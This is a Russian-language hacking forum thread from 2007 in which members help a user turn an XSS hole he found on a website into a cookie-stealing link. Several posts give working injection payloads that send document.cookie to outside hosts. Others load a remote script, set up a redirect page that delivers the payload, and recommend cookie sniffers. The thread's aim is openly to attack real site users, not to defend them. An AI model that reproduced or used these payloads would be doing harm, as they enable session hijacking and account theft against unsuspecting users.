ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

помогите с Xss
  #1  
Старый 01.02.2007, 20:21
Аватар для Aerot1smo
Aerot1smo
Banned
Регистрация: 06.07.2006
Сообщений: 83
Провел на форуме:
644264

Репутация: 26
По умолчанию помогите с Xss

короче нашёл на сайте хсс и вот хочу спросить,как ссылку сделать?я так сделал,правильно ли?

site.com"><script>img=new Image();img.src="http://liz0.xf.cz/i.gif?"+document.cookie;</script>

и ещё,я так понял что там где site.com надо ставить ссылку той страница где я нашёл ХСС,так ли это?
 
Ответить с цитированием

  #2  
Старый 01.02.2007, 23:07
Аватар для Micr0b
Micr0b
Участник форума
Регистрация: 14.01.2006
Сообщений: 242
Провел на форуме:
2630617

Репутация: 245
Отправить сообщение для Micr0b с помощью ICQ
По умолчанию

да ты все верно понял но мне кажется лутше делай так:

1) site.com"><script%20src=http://xss-xss.nm.ru/js.js></script>
js.js
img=new Image();img.src="http://liz0.xf.cz/i.gif?"+document.cookie;
2) Или залей на какуюто страницу лутше index.htm

<script language="JavaScript">
document.location.href="http://site.com'><script%20src=http://xss-xss.nm.ru/js.js></script>";
</script>

кажысь так все у тебя получится
 
Ответить с цитированием

  #3  
Старый 01.02.2007, 23:32
Аватар для Aerot1smo
Aerot1smo
Banned
Регистрация: 06.07.2006
Сообщений: 83
Провел на форуме:
644264

Репутация: 26
По умолчанию

да,я так пробывал тока вот чёто неприходили данные.На халявных хостах будет пахать?
 
Ответить с цитированием

  #4  
Старый 02.02.2007, 00:13
Аватар для Micr0b
Micr0b
Участник форума
Регистрация: 14.01.2006
Сообщений: 242
Провел на форуме:
2630617

Репутация: 245
Отправить сообщение для Micr0b с помощью ICQ
По умолчанию

должно ... если у тебя неполучится на фрее-хостах попробуй ачатовской сниффер.)
 
Ответить с цитированием

  #5  
Старый 02.02.2007, 09:57
Аватар для Aerot1smo
Aerot1smo
Banned
Регистрация: 06.07.2006
Сообщений: 83
Провел на форуме:
644264

Репутация: 26
По умолчанию

а смотрите,я сделал себе снифф на ачате http://antichat.org/s/***/log.php
какой адресс замой картинки то?

и ещё,я вот ищу хсс спомощью проги Acunetix 4
и он находит хсс в "/",возможно ли её осуществить,если да то как?

Последний раз редактировалось Aerot1smo; 02.02.2007 в 10:17..
 
Ответить с цитированием

  #6  
Старый 02.02.2007, 20:59
Аватар для o3,14um
o3,14um
Участник форума
Регистрация: 16.11.2006
Сообщений: 230
Провел на форуме:
599789

Репутация: 227
По умолчанию

попробуй так:
site.com"><script>img=new Image();img.src="http://liz0.xf.cz/i.gif?"+escape(document.cookie)</script>
 
Ответить с цитированием

  #7  
Старый 07.02.2007, 11:35
Аватар для Yrik123
Yrik123
Новичок
Регистрация: 29.01.2007
Сообщений: 2
Провел на форуме:
68469

Репутация: 0
По умолчанию

Цитата:
Сообщение от o3,14um  
попробуй так:
site.com"><script>img=new Image();img.src="http://liz0.xf.cz/i.gif?"+escape(document.cookie)</script>
Ребят скажите почему это не работает:
Вызов из ява-скрипта :
<script>
img = new Image();
img.src = "http://адрес/sniffer.gif?"+document.cookie;
</script>
пробовал так, создал файлик html, его содержание:
<br>
<br>
<a href="http://google.com">google</a><br>
<script>
img = new image();
img.src = "http://адрес/sniffer.gif?"+document.cookie;
</script>
<br>

На снифер ничего не приходит, почему скажите пожалуйста...Читал много, все одно и тоже, но не фига...снифер Kanickа...
 
Ответить с цитированием

  #8  
Старый 07.02.2007, 19:41
Аватар для Pashahak
Pashahak
Banned
Регистрация: 16.01.2007
Сообщений: 18
Провел на форуме:
62578

Репутация: -20
По умолчанию

Цитата:
Сообщение от Aerot1smo  
короче нашёл на сайте хсс и вот хочу спросить,как ссылку сделать?я так сделал,правильно ли?

site.com"><script>img=new Image();img.src="http://liz0.xf.cz/i.gif?"+document.cookie;</script>

и ещё,я так понял что там где site.com надо ставить ссылку той страница где я нашёл ХСС,так ли это?
Только зачем страница с XSS где ты нашел, не пойму!?
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
ПомогитЕ !!! подалуста найти кряк гейлордфакерЪ Болталка 2 30.08.2007 14:48
ПоМоГиТе! ПЛЗ!!! farik.aka E-Mail 1 17.09.2006 13:00
Xss для новичков Micr0b Уязвимости 0 04.06.2006 18:25



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ